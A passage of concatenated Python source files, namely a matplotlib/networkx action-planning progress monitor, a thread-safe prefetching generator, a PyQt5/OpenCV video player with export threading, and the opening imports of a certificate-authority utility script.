"""Used to indicate to the drawing thread that data has been updated."""
pass
class MonitorStopRequest(object):
"""Used to indicate the drawing thread should close the window and exit."""
pass
class ActionMonitor(object):
"""Visualizer for action planning progress."""
def __init__(self):
# Create a lock for thread safety
self.lock = threading.Lock()
# Create an internal queue to be used by the internal
# draw and upate thread
self.update_request_queue = Queue()
# Setup internal data structures
self.reset()
# Spin off drawing thread
self.drawing_thread = threading.Thread(target=self._draw)
self.drawing_thread.start()
def stop(self):
"""Stop visualizing progress."""
self.update_request_queue.put(MonitorStopRequest())
self.drawing_thread.join()
def _draw(self):
"""Keep calling _redraw until visualization stops."""
self.ax_graph = pylab.subplot(121)
self.ax_bar = pylab.subplot(122)
plt.show(block=False)
plt.rcParams.update({
'font.family': 'serif',
'font.serif': 'Computer Modern Roman',
'font.size': 12,
'legend.fontsize': 12,
'legend.labelspacing': 0,
'text.usetex': True,
'savefig.dpi': 300
})
# Set the window title
plt.gcf().canvas.set_window_title('HGPC Monitor')
keep_running = True
while keep_running:
self._redraw()
req = self.update_request_queue.get()
keep_running = not isinstance(req, MonitorStopRequest)
plt.close()
def reset(self):
"""Reset visualization."""
self.lock.acquire()
try:
self.node_metadata = {}
self.current_planning = None # planning
self.current_post_processing = None # post processing
self.current_executing = None # executing
self.planned_actions = [
] # Keep track of the actions in the order they are planned
self.active_actions = []
# Initialize a graph for the action ordering
self.G = nx.DiGraph(format='svg')
finally:
self.lock.release()
def set_graph(self, G, node_map):
"""
Initialize graph.
@param G: networkx graph representing the relationship between actions
@param node_map: mapping from node name in G to action
"""
self.lock.acquire()
try:
self.G = G
for node in self.G.nodes():
if node not in self.node_metadata:
self.node_metadata[node] = {
'color': get_color(ActionResults.UNKNOWN),
'results': []
}
self.node_map = node_map
self.action_map = {v: k for k, v in node_map.iteritems()}
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def _draw_dot_plots(self):
"""Draw dot plots."""
# Clear the existing axis
self.ax_bar.cla()
categories = self.planned_actions
if len(categories) == 0:
return
# Build a set of nodes with a custom layout
G = nx.Graph()
node_pos = {}
label_map = {}
label_pos = {}
color_map = {}
node_spacing = 0.2
for idx, category in enumerate(categories):
# Add nodes for every result
results = self.node_metadata[category]['results']
for ridx, res in enumerate(results):
node_label = '%d_%d' % (idx, ridx)
G.add_node(node_label)
color_map[node_label] = get_color(res)
node_pos[node_label] = (0.2 * ridx, idx)
if len(results):
node_label = '%d_0' % (idx)
action = self.node_map[category]
label_map[node_label] = get_action_name(action)
label_pos[node_label] = (0.2 * len(results), idx)
nodesize = 50
fontsize = 10
max_x = max([0.0] + [v[0] for v in node_pos.values()])
label_pos = {
k: (max_x + node_spacing, v[1])
for k, v in label_pos.iteritems()
}
color_list = [color_map[a] for a in G.nodes()]
nx.draw_networkx_nodes(
G,
node_pos,
ax=self.ax_bar,
nodelist=G.nodes(),
node_color=color_list,
node_size=nodesize)
labels = nx.draw_networkx_labels(
G,
label_pos,
label_map,
ax=self.ax_bar,
font_size=fontsize,
font_family='serif',
horizontalalignment='left')
self.ax_bar.get_xaxis().set_visible(False)
self.ax_bar.get_yaxis().set_visible(False)
self.ax_bar.set_title('Planning Results by Action')
max_y = max([0.0] + [v[1] for v in node_pos.values()])
max_x = max([0.0] + [v[0] for v in node_pos.values()])
self.ax_bar.set_ylim((-1., max_y + 1))
self.ax_bar.set_xlim((-0.2, max_x + 1.5))
def _draw_bargraphs(self):
"""Draw bar graphs."""
def compute_success(results):
"""
Compute number of Actions that succeeded.
@param results: list of ActionResults
@return number of successes
"""
return sum([1 if r == ActionResults.DETERMINISTIC_SUCCESS or \
r == ActionResults.NONDETERMINISTIC_SUCCESS \
else 0 for r in results])
def compute_failures(results):
"""
Compute number of Actions that failed.
@param results: list of ActionResults
@return number of failures
"""
return len(results) - compute_success(results)
categories = self.planned_actions
if len(categories) == 0:
return
bar_height = 1.0
category_positions = np.arange(
bar_height * 1.5, 1.5 * bar_height * len(categories) + 0.1,
1.5 * bar_height)
failure_counts = [
compute_failures(self.node_metadata[c]['results'])
for c in categories
]
success_counts = [
compute_success(self.node_metadata[c]['results'])
for c in categories
]
plt.hold(False)
self.ax_bar.barh(
category_positions,
failure_counts,
align='center',
height=bar_height,
color=get_color(ActionResults.FAILURE),
lw=0)
plt.hold(True)
self.ax_bar.barh(
category_positions,
success_counts,
align='center',
height=bar_height,
color=get_color(ActionResults.NONDETERMINISTIC_SUCCESS),
lw=0)
self.ax_bar.set_yticks([])
for idx, category in enumerate(categories):
action = self.node_map[category]
self.ax_bar.text(
0.1,
category_positions[idx],
r'%s' % get_action_name(action),
va='center',
ha='left')
max_xval = max(
[len(c['results']) for c in self.node_metadata.itervalues()])
delta = 1 if max_xval < 10 else 5
self.ax_bar.set_xticks(range(0, max_xval, delta) + [max_xval])
self.ax_bar.set_xlabel('Planning Counts')
self.ax_bar.set_xlim((0, max(failure_counts) + 0.5))
self.ax_bar.set_ylim([
category_positions[0] - bar_height, category_positions[-1] +
bar_height
])
# Simplify axis
self.ax_bar.set_frame_on(False)
xmin, xmax = self.ax_bar.get_xaxis().get_view_interval()
ymin, ymax = self.ax_bar.get_yaxis().get_view_interval()
self.ax_bar.add_artist(
plt.Line2D(
(xmin, xmin), (ymin, ymax),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.add_artist(
plt.Line2D(
(xmax, xmax), (ymin, ymax),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.add_artist(
plt.Line2D(
(xmin, xmax), (ymin, ymin),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.add_artist(
plt.Line2D(
(xmin, xmax), (ymax, ymax),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.get_yaxis().tick_left()
self.ax_bar.get_xaxis().tick_bottom()
def _compute_layout(self,
node,
branch_id,
pos_layout,
label_layout,
depth=0):
"""
Recursively compute the node layout.
@param node: node id to compute the layout with
@param branch_id: branch id for layout
@param pos_layout: dictionary of node positions
@param label_layout: dictionary of label positions
@param depth: depth of current node from root nodes
"""
if node not in pos_layout:
pos_layout[node] = (branch_id, depth)
label_layout[node] = (branch_id, depth)
children = self.G.successors(node)
for idx, succ in enumerate(children):
self._compute_layout(succ, branch_id + 2. * idx / (1.0 * depth + 5.0),
pos_layout, label_layout, depth + 1)
def _draw_graph(self):
"""Draw the planning tree as a graph."""
# Clear the existing axis
self.ax_graph.cla()
# Grab all the nodes and setup a unique layout
nodelist = self.G.nodes()
if len(nodelist) == 0:
# nothing to draw yet
return
small_nodesize = 2000 / len(nodelist)
large_nodesize = max(200, 2. * small_nodesize)
fontsize = 10
color_list = [self.node_metadata[a]['color'] for a in nodelist]
size_list = [large_nodesize if a == self.current_planning or \
a == self.current_post_processing or \
a == self.current_executing
else small_nodesize for a in nodelist]
label_dict = {a: "" for a in nodelist}
if self.current_planning is not None:
action = self.node_map[self.current_planning]
label_dict[self.current_planning] = '%s' % get_action_name(action)
if self.current_post_processing is not None and self.current_post_processing in label_dict:
action = self.node_map[self.current_post_processing]
label_dict[
self.
current_post_processing] = '%s (post-processing)' % get_action_name(
action)
if self.current_executing is not None and self.current_executing in label_dict:
action = self.node_map[self.current_executing]
label_dict[
self.current_executing] = '%s (executing)' % get_action_name(
action)
fontsize_list = [
fontsize * 2. if a == self.current_planning else fontsize
for a in nodelist
]
root_nodes = [n for n in self.G.nodes() if self.G.in_degree(n) == 0]
node_pos = dict()
label_pos = dict()
for idx, node in enumerate(root_nodes):
self._compute_layout(node, 0.2 * idx, node_pos, label_pos)
max_out_degree = max([
max(self.G.in_degree(n), self.G.out_degree(n))
for n in self.G.nodes()
])
for key, val in label_pos.iteritems():
label_pos[key] = (0.2 * max_out_degree + 0.1, val[1])
nx.draw_networkx_nodes(
self.G,
node_pos,
ax=self.ax_graph,
nodelist=self.G.nodes(),
node_color=color_list,
node_size=size_list)
nx.draw_networkx_edges(
self.G,
node_pos,
ax=self.ax_graph,
edgelist=self.G.edges(),
edge_color='k',
width=1.,
alpha=0.5)
nx.draw_networkx_labels(
self.G,
label_pos,
label_dict,
ax=self.ax_graph,
font_size=fontsize,
font_family='serif',
horizontalalignment='left')
self.ax_graph.get_xaxis().set_visible(False)
self.ax_graph.get_yaxis().set_visible(False)
self.ax_graph.set_title('Planning Progress')
max_y = max([v[1] for v in node_pos.values()])
self.ax_graph.set_ylim((-1., max_y + 1))
self.ax_graph.set_xlim((-0.2, max_out_degree + 0.5))
def _redraw(self):
"""Redraw the graphs. Should be called when any metadata is updated."""
self._draw_graph()
self._draw_dot_plots()
pylab.draw()
def set_planning_action(self, action):
"""
Mark the action that is currently being planned by the system.
@param action: Action currently being planned
"""
self.lock.acquire()
try:
# Get the node id in the graph for this action
node_id = self.action_map.get(action, None)
# Mark this action as currently being planned
self.current_planning = node_id
if node_id is not None and node_id not in self.planned_actions:
self.planned_actions.append(node_id)
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def set_post_processing_action(self, action):
"""
Mark the action that is currently being postprocessed by the system.
@param action: Action currently being postprocessed
"""
self.lock.acquire()
try:
# Get the node id in the graph for this action
node_id = self.action_map.get(action, None)
# Mark this action as currently being post-processed
self.current_post_processing = node_id
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def set_executing_action(self, action):
"""
Mark the action that is currently being executed by the system.
@param action: Action currently being executed
"""
self.lock.acquire()
try:
# Get the node id in the graph for this action
node_id = self.action_map.get(action, None)
# Mark this action as currently being executed
self.current_executing = node_id
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def update(self, action, success, deterministic):
"""
Update the counts on success or failed planning for the action.
@param action: Action to update
@param success: True if a plan was successfully generated for the Action
@param deterministic: True if the method to solve the action is
deterministic
"""
self.lock.acquire()
try:
node_id = self.action_map[action]
if node_id not in self.node_metadata:
self.node_metadata[node_id] = {
'color': get_color(ActionResults.UNKNOWN),
'results': []
}
if success:
if deterministic:
result = ActionResults.DETERMINISTIC_SUCCESS
else:
result = ActionResults.NONDETERMINISTIC_SUCCESS
else:
result = ActionResults.FAILURE
self.node_metadata[node_id]['results'] += [result]
self.node_metadata[node_id]['color'] = get_color(result)
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
|
generator.py
|
import logging
import threading
from queue import Queue
from typing import Any, Iterable
import threading
logger = logging.getLogger(__name__)
class ThreadSafeGen:
"""
Wraps generators to make them thread safe
"""
def __init__(self, iterable: Iterable[Any]):
"""
"""
self.iterable = iterable
self.lock = threading.Lock()
def __iter__(self):
return self
def __next__(self):
with self.lock:
return next(self.iterable)
class PrefetchGenerator:
"""
Applys functions asynchronously to the output of a generator.
Useful for modifying the generator results based on data from a network
"""
def __init__(self, data: Iterable[Any], prefetch_limit=20, num_executors=4):
if isinstance(data, (list, tuple)):
self._data = (r for r in data)
else:
self._data = data
self.queue = Queue(prefetch_limit)
self._data = ThreadSafeGen(self._data)
self.completed_threads = 0
# Can only iterate over once it the queue.get hangs forever.
self.done = False
self.num_executors = num_executors
self.threads = [
threading.Thread(target=self.fill_queue)
for _ in range(num_executors)
]
for thread in self.threads:
thread.daemon = True
thread.start()
def _process(self, value) -> Any:
raise NotImplementedError("Abstract method needs to be implemented")
def fill_queue(self):
try:
for value in self._data:
value = self._process(value)
if value is None:
raise ValueError("Unexpected None")
self.queue.put(value)
except Exception as e:
logger.warning("Unexpected exception while filling the queue. %r",
e)
finally:
self.queue.put(None)
def __iter__(self):
return self
def __next__(self) -> Any:
if self.done:
raise StopIteration
value = self.queue.get()
while value is None:
self.completed_threads += 1
if self.completed_threads == self.num_executors:
self.done = True
for thread in self.threads:
thread.join()
raise StopIteration
value = self.queue.get()
return value
|
Video copy.py
|
from PyQt5 import QtGui
from PyQt5.QtCore import QDir, QEvent, QObject, QSize, QUrl, Qt, QThread, pyqtSignal, QMutex
from PyQt5.QtMultimedia import QMediaContent, QMediaPlayer
from PyQt5.QtMultimediaWidgets import QVideoWidget
from PyQt5.QtWidgets import QDockWidget, QFileDialog, QHBoxLayout, QLabel, QPushButton, QSlider, QStackedLayout, QWidget, QVBoxLayout, QProgressBar
from PyQt5.QtGui import QCursor, QFont, QImage, QPixmap
import cv2, os, shutil, atexit, numpy, time
from BlurObject import *
from Cursor import Cursor
class VideoThread(QThread):
changePixmap = pyqtSignal(QImage)
newFrame = pyqtSignal(int, numpy.ndarray)
stateChanged = pyqtSignal(bool) # True for playing started. False for playing stopped
positionChanged = pyqtSignal(int)
def __init__(self, parent=None, video=None):
super().__init__(parent)
self.__kill = False
self.mutex = QMutex()
self.__exporter = None
self.video = video
self.fps = self.video.get(cv2.CAP_PROP_FPS)
self.resolution = self.video.get(cv2.CAP_PROP_FRAME_WIDTH), self.video.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.output_resolution = self.resolution
# play state
self.number_of_frames = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
self.current_frame = 0
self.__is_playing = False
self.__is_exporting = False
self.__exportWorker = None
self.__exportThread = None
self.__frame = None
if video is None:
raise Exception("Must provide a video")
@property
def playing(self):
return self.__is_playing
@property
def frame(self):
return self.__frame
@property
def duration(self):
return self.number_of_frames / self.fps
def run(self):
ret, frame = self.step()
self.render_frame()
while not self.__kill:
while not self.__kill and ret and self.playing and not self.__is_exporting:
self.render_frame()
# Wait and get next frame
time.sleep(1/self.fps) # TODO: account for processing time
if (self.current_frame >= self.number_of_frames-1):
self.pause()
else:
ret, frame = self.step()
# while not self.__kill and ret and self.__is_exporting:
# print("Exporting Frame", self.current_frame, "of", self.number_of_frames-1)
# if (self.current_frame >= self.number_of_frames-1):
# self.__is_exporting = False
# self.__finishExport()
# print("Export done no ret failure :)")
# else:
# ret, frame = self.step()
# self.__export_progress_bar.setValue(self.current_frame)
# if not ret:
# print("No return during export at frame {} / {}".format(self.current_frame-1, self.number_of_frames-1))
# ret = True
# self.__is_exporting = False
# self.__finishExport()
# print("Export done")
# # break
while not self.__kill and not self.playing and not self.__is_exporting:
time.sleep(1/self.fps) # do nothing
print("Video Thread Closing")
def export(self, path, progressbar):
if self.__is_exporting or self.__exportWorker is not None or self.__exportThread is not None:
raise Exception("Must wait until previous export is finished")
self.__is_exporting = True
self.__exportWorker = Exporter(progressbar, self, path)
self.__exportThread = QThread()
self.__exportWorker.moveToThread(self.__exportThread)
self.__exportWorker.start()
self.__exportWorker.exportComplete.connect(self.__export_end)
# self.__exportWorker.start()
def __export_end(self):
self.__exportWorker.kill()
self.__exportThread.terminate()
self.__exportThread.wait()
self.__is_exporting = False
self.__exportWorker = None
self.__exportThread = None
# def __finishExport(self):
# print("Render loop closed")
# # Close writer and remove listeners
# self.__exporter.release()
# self.__exporter = None
# self.__is_exporting = False
# self.newFrame.disconnect(self.__exportFrame)
# print("Writer Closed")
# self.set_frame(self.__export_start_position)
# # remove progress bar
# self.__export_progress_bar.setValue(self.number_of_frames)
# self.__export_progress_bar.parent().layout().removeWidget(self.__export_progress_bar)
# self.__export_progress_bar.setParent(None)
# self.__export_progress_bar.deleteLater()
# def export(self, path, progressbar):
# print("Exporting to", path)
# # Get export information and video writer
# self.__export_start_position = self.current_frame
# resolution = tuple(map(int, self.resolution))
# self.__exporter = cv2.VideoWriter(
# path,
# cv2.VideoWriter_fourcc(*"X264"),
# self.fps,
# resolution)
# # Move video to beginning and listen for frames to export
# self.pause()
# self.newFrame.connect(self.__exportFrame)
# self.set_frame(0)
# self.positionChanged.emit(self.current_frame)
# # Create progress bar
# self.__export_progress_bar = progressbar
# self.__export_progress_bar.setMaximum(self.number_of_frames)
# self.__export_progress_bar.setValue(0)
# # Read first frame
# self.step()
# self.__is_exporting = True # causes thread to start exporting
# def __exportFrame(self, index, frame):
# if (self.__exporter != None):
# self.mutex.lock()
# self.__exporter.write(frame)
# self.mutex.unlock()
def play(self):
if self.playing:
pass
else:
print("Thread playing")
if self.current_frame >= self.number_of_frames-1:
self.set_frame(0)
self.__is_playing = True
self.stateChanged.emit(self.playing)
def pause(self):
if not self.playing:
pass
else:
print("Thread Pausing")
self.__is_playing = False
self.stateChanged.emit(self.playing)
def step(self):
self.mutex.lock()
ret, self.__frame = self.video.read()
self.mutex.unlock()
self.current_frame += 1
if ret:
self.mutex.lock()
self.newFrame.emit(self.current_frame, self.__frame)
self.mutex.unlock()
return (ret, self.__frame)
def render_frame(self):
self.positionChanged.emit(self.current_frame)
rgb = cv2.cvtColor(self.__frame, cv2.COLOR_BGR2RGB)
# Convert into QT Format
h, w, ch = rgb.shape
bytesPerLine = ch*w
qtImage = QImage(rgb, w, h, bytesPerLine, QImage.Format_RGB888)
scaled = qtImage.scaled(self.output_resolution[0], self.output_resolution[1], Qt.KeepAspectRatio)
self.changePixmap.emit(scaled) # emit event
def set_frame(self, frame_index):
if (0 <= frame_index < self.number_of_frames):
self.mutex.lock()
self.current_frame = frame_index
self.video.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, self.__frame = self.video.read()
self.mutex.unlock()
self.newFrame.emit(self.current_frame, self.__frame)
self.render_frame()
else:
raise Exception("index {} is out of the video bounds 0 -> {}".format(frame_index, self.number_of_frames))
def reblit(self):
self.set_frame(self.current_frame)
def rerender(self):
self.render_frame()
def updateSize(self, x, y):
aspect_ratio = self.resolution[0] / self.resolution[1]
x = x
y = x/aspect_ratio
self.output_resolution = [x, y]
print("Request to update resolution of {} video ({} aspect ratio) to {} ({} aspect ratio).\n\tActually set to {}".format(
self.resolution, aspect_ratio,
(x, y), x/y,
self.output_resolution
))
def kill(self):
self.__kill = True
if self.__exportWorker is not None:
self.__exportWorker.kill()
if self.__exportThread is not None:
self.__exportThread.terminate()
self.__exportThread.wait()
self.terminate()
self.wait()
class Exporter(QThread):
exportComplete = pyqtSignal()
def __init__(self, progressbar: QProgressBar, videoObject: VideoThread, path: str):
super().__init__()
self.progressbar = progressbar
self.video = videoObject
self.path = path
self.running = True
videoObject.newFrame.connect(self.exportFrame)
print("Initialized Exporter Thread")
def run(self):
ret, frame = self.video.step()
while ret and self.running:
# print("Exporting Frame", self.video.current_frame, "of", self.video.number_of_frames-1)
if (self.video.current_frame >= self.video.number_of_frames-1):
break
elif (not ret):
break
else:
ret, frame = self.video.step()
self.progressbar.setValue(self.video.current_frame)
# print("Frame", ret, self.__frame[:4])
self.__finishExport()
print("Export done")
def start(self):
super().start()
print("Exporting to", self.path)
print("Video has {} frames and lasts {} seconds".format(self.video.number_of_frames, self.video.duration))
# Get export information and video writer
self.__export_start_position = self.video.current_frame
resolution = tuple(map(int, self.video.resolution))
print("-"*50)
self.exporter = cv2.VideoWriter(
self.path,
cv2.VideoWriter_fourcc(*"X264"),
self.video.fps,
resolution)
# Move video to beginning and listen for frames to export
self.video.pause()
self.video.newFrame.connect(self.exportFrame)
self.video.set_frame(0)
# self.video.positionChanged.emit(self.video.current_frame)
# Create progress bar
self.progressbar.setMaximum(self.video.number_of_frames)
self.progressbar.setValue(0)
# if (ret):
# self.__run()
def __finishExport(self):
# Close writer and remove listeners
self.exporter.release()
self.exporter = None
self.video.newFrame.disconnect(self.exportFrame)
print("Writer Closed")
self.video.set_frame(self.__export_start_position)
# remove progress bar
self.progressbar.setValue(self.video.number_of_frames)
self.progressbar.parent().layout().removeWidget(self.progressbar)
self.progressbar.setParent(None)
self.progressbar.deleteLater()
self.exportComplete.emit()
def exportFrame(self, index, frame):
if (self.exporter != None):
# print("Frame", index, frame[:4])
self.exporter.write(frame)
def kill(self):
self.running = False
self.terminate()
self.wait()
class Video(QLabel):
__sizeChanged = pyqtSignal(int, int)
newFrame = pyqtSignal(int, numpy.ndarray) # Outputs an OpenCV frame before it is rendered to GUI
positionChanged = pyqtSignal(int)
stateChanged = pyqtSignal(bool)
# Click Events
mouse_down = pyqtSignal(tuple)
mouse_move = pyqtSignal(tuple)
mouse_up = pyqtSignal(tuple)
mouse_over = pyqtSignal(tuple)
mouse_leave = pyqtSignal(tuple)
scroll_event = pyqtSignal(int, float, float)
def __init__(self, parent=None, video="./SampleVideo.mp4"):
super().__init__(parent)
self.setLayout(QVBoxLayout())
self.layout().setSpacing(0)
self.layout().setContentsMargins(0, 0, 0, 0)
self.setStyleSheet("border: #f00 solid 5px")
# Load Video
self._video_path = video
self.video = cv2.VideoCapture(video)
atexit.register(self.video.release)
self.__fps = self.video.get(cv2.CAP_PROP_FPS)
self.__resolution = self.video.get(cv2.CAP_PROP_FRAME_WIDTH), self.video.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.__number_of_frames = self.video.get(cv2.CAP_PROP_FRAME_COUNT)
print("Playing {} at {} fps and {}x{}".format(self._video_path, self.fps, self.resolution[0], self.resolution[1]))
# Video Reader
self.__image_update_thread = VideoThread(self, video=self.video)
self.__image_update_thread.changePixmap.connect(self.__setImage)
self.__image_update_thread.start()
self.__sizeChanged.connect(self.__image_update_thread.updateSize)
# Pass through signals
self.__image_update_thread.newFrame.connect(self.newFrame.emit, type=Qt.DirectConnection)
self.__image_update_thread.positionChanged.connect(self.positionChanged.emit)
self.__image_update_thread.stateChanged.connect(self.stateChanged.emit)
# Click Events
# self.mouse_down = pyqtSignal(Video, tuple)
# self.mouse_move = pyqtSignal(Video, tuple)
# self.mouse_up = pyqtSignal(Video, tuple)
self.setFixedWidth(self.resolution[0]/2)
# Blurring
self._blur_strands = []
self._blur_object = None
# Set Cursor
self.setCursor(Cursor())
# self.setCursor(QCursor(Qt.CrossCursor))
# cursor_size = self.cursor().pixmap().size()
# self.cursor().pixmap().load("../assets/erase.png")
# print("Cursor size",cursor_size.width(), cursor_size.height())
self.installEventFilter(self)
@property
def duration(self):
return self.number_of_frames / self.fps
@property
def number_of_frames(self):
return self.__number_of_frames
@property
def resolution(self):
return self.__resolution
@property
def fps(self):
return self.__fps
@property
def playing(self):
return self.__image_update_thread.playing
@property
def position(self):
return self.__image_update_thread.current_frame
@property
def frame(self):
return self.__image_update_thread.frame
def __setImage(self, image):
self.setPixmap(QPixmap.fromImage(image))
def export(self, path, progressbar):
self.__image_update_thread.export(path, progressbar)
def setFixedSize(self, x, y):
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = x
y = x / aspect_ratio
super().setFixedSize(x, y)
self.__sizeChanged.emit(x, y)
def setMinimumSize(self, x, y):
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = x
y = x / aspect_ratio
super().setMinimumSize(x, y)
self.__sizeChanged.emit(x, y)
def setFixedHeight(self, h: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = h * aspect_ratio
y = h
self.setFixedSize(x, y)
def setFixedWidth(self, w: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = w
y = w / aspect_ratio
self.setFixedSize(x, y)
def setMinimumHeight(self, minh: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = minh * aspect_ratio
y = minh
self.setMinimumSize(x, y)
def setMinimumWidth(self, minw: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = minw
y = minw / aspect_ratio
self.setMinimumSize(x, y)
def play(self):
print("Playing")
self.__image_update_thread.play()
def pause(self):
print("Pausing")
self.__image_update_thread.pause()
def setPosition(self, frame):
self.__image_update_thread.set_frame(frame)
def reblit(self):
self.__image_update_thread.reblit()
def rerender(self):
self.__image_update_thread.rerender()
def convert_point_to_video(self, x, y):
'''
Converts a point in the Video object PyQt space
into the pixel in the video element
'''
new_x = numpy.interp(x, [0, self.size().width()], [0, self.resolution[0]])
new_y = numpy.interp(y, [0, self.size().height()], [0, self.resolution[1]])
return (new_x, new_y)
def eventFilter(self, obj, event):
if obj is self:
if event.type() == QEvent.Enter:
self.mouse_over.emit((event, self))
elif event.type() == QEvent.Leave:
self.mouse_leave.emit((event, self))
return super(Video, self).eventFilter(obj, event)
def wheelEvent(self, a0: QtGui.QWheelEvent) -> None:
steps = a0.angleDelta().y() // 120
self.scroll_event.emit(steps, a0.position().x(), a0.position().y())
return super().wheelEvent(a0)
def mousePressEvent(self, a0: QtGui.QMouseEvent) -> None:
click = (a0.localPos().x(), a0.localPos().y())
frame_loc = self.convert_point_to_video(*click)
self.mouse_down.emit((self, frame_loc))
return super().mousePressEvent(a0)
def mouseMoveEvent(self, a0: QtGui.QMouseEvent) -> None:
click = (a0.localPos().x(), a0.localPos().y())
frame_loc = self.convert_point_to_video(*click)
self.mouse_move.emit((self, frame_loc))
return super().mouseMoveEvent(a0)
def mouseReleaseEvent(self, a0: QtGui.QMouseEvent) -> None:
click = (a0.localPos().x(), a0.localPos().y())
frame_loc = self.convert_point_to_video(*click)
self.mouse_up.emit((self, frame_loc))
return super().mouseReleaseEvent(a0)
def deleteLater(self):
print("Killing video thread")
self.__image_update_thread.kill()
class VideoWidget(QWidget): #QDock
Widgets = []
# Passthrough click events
mouse_down = pyqtSignal(tuple)
mouse_move = pyqtSignal(tuple)
mouse_up = pyqtSignal(tuple)
mouse_over = pyqtSignal(Video)
mouse_leave = pyqtSignal(Video)
scroll_event = pyqtSignal(Video, int, float, float)
def __init__(self, name="Video", path=None, toolbar=None):
super().__init__()
# self.setFloating(False)
# self.setFeatures(QDockWidget.DockWidgetMovable)
# self.setAllowedAreas(Qt.AllDockWidgetAreas)
# Structure
self.setLayout(QVBoxLayout())
self.setObjectName("VideoWidget")
# Close button
self.closeButton = QPushButton()
self.closeButton.setText("X")
self.closeButton.setEnabled(True)
self.closeButton.clicked.connect(self.deleteLater)
self.layout().addWidget(self.closeButton)
# Video
self.videoContainer = QWidget()
self.videoContainer.setLayout(QStackedLayout())
self.video = Video(None, video=path)
self.videoContainer.layout().addWidget(self.video)
self.layout().addWidget(self.videoContainer)
self.video.stateChanged.connect(self.__onPlayerStateChange)
# self.video.setFixedWidth(640)
# Buttons
self.buttonRow = QWidget()
self.buttonRowLayout = QHBoxLayout()
self.buttonRow.setLayout(self.buttonRowLayout)
self.layout().addWidget(self.buttonRow)
# Play
self.playButton = QPushButton()
self.playButton.setText("Play")
self.playButton.setEnabled(False)
self.playButton.clicked.connect(self.play)
self.buttonRowLayout.addWidget(self.playButton)
# Progress Bar
self.progressSlider = QSlider(Qt.Horizontal)
self.progressSlider.setRange(0, int(self.video.number_of_frames-1))
self.progressSlider.sliderMoved.connect(self.setPosition) # set position when user moves slider
self.progressSlider.sliderPressed.connect(self.video.pause) # pause when user presses slider
self.video.positionChanged.connect(self.progressSlider.setValue) # update the slider as video plays
self.buttonRowLayout.addWidget(self.progressSlider)
# Passthrough click events
self.video.mouse_down.connect(self.mouse_down.emit)
self.video.mouse_move.connect(self.mouse_move.emit)
self.video.mouse_up.connect(self.mouse_up.emit)
self.video.mouse_over.connect(lambda data: self.mouse_over.emit(data[1]))
self.video.mouse_leave.connect(lambda data: self.mouse_leave.emit(data[1]))
self.video.scroll_event.connect(lambda val, x, y: self.scroll_event.emit(self.video, val, x, y))
# Register with Toolbar
toolbar.register_video(self)
VideoWidget.Widgets.append(self)
self.destroyed.connect(lambda: VideoWidget.Widgets.remove(self)) # TODO: check if this works
@property
def display_resolution(self):
return (self.video.size().width(), self.video.size().height())
@property
def video_resolution(self):
return self.video.resolution
def pause(self):
self.video.pause()
def play(self):
''' plays or pauses video '''
if self.video.playing:
self.video.pause()
else:
self.video.play()
def __onPlayerStateChange(self, state):
''' changes the play/pause button depending on state '''
if state:
self.playButton.setText("Pause")
else:
self.playButton.setText("Play")
def setPosition(self, pos):
''' Sets the current playback position of the video '''
self.video.setPosition(pos)
def reblit(self):
self.video.reblit()
def export(self, filename) :
# QThread.thread()
# threading.Thread(target=self.video.export, args=(filename, ))
self.__export_progress_bar = QProgressBar()
self.layout().addWidget(self.__export_progress_bar)
self.__export_progress_bar.setGeometry(200, 80, 250, 20)
self.video.export(filename, self.__export_progress_bar)
# def __onVideoDurationChange(self, duration):
# self.progressSlider.setRange(0, duration)
def deleteLater(self) -> None:
print("Deleting")
self.video.deleteLater()
print("Deleted Video")
return super().deleteLater()
|
ca_util.py
|
#!/usr/bin/env python
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import common
logger = common.init_logging('ca-util')
import sys
import os
import crypto
import base64
import argparse
import ConfigParser
import getpass
import json
import zipfile
import cStringIO
import socket
import revocation_notifier
import threading
import BaseHTTPServer
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
import functools
import signal
import time
import tpm_exec
import datetime
if common.CA_IMPL=='cfssl':
import ca_impl_cfssl as ca_impl
elif common.CA_IMPL=='openssl':
import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
from M2Crypto import X509, EVP, BIO
config = ConfigParser.SafeConfigParser()
config.read(common.CONFIG_FILE)
"""
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
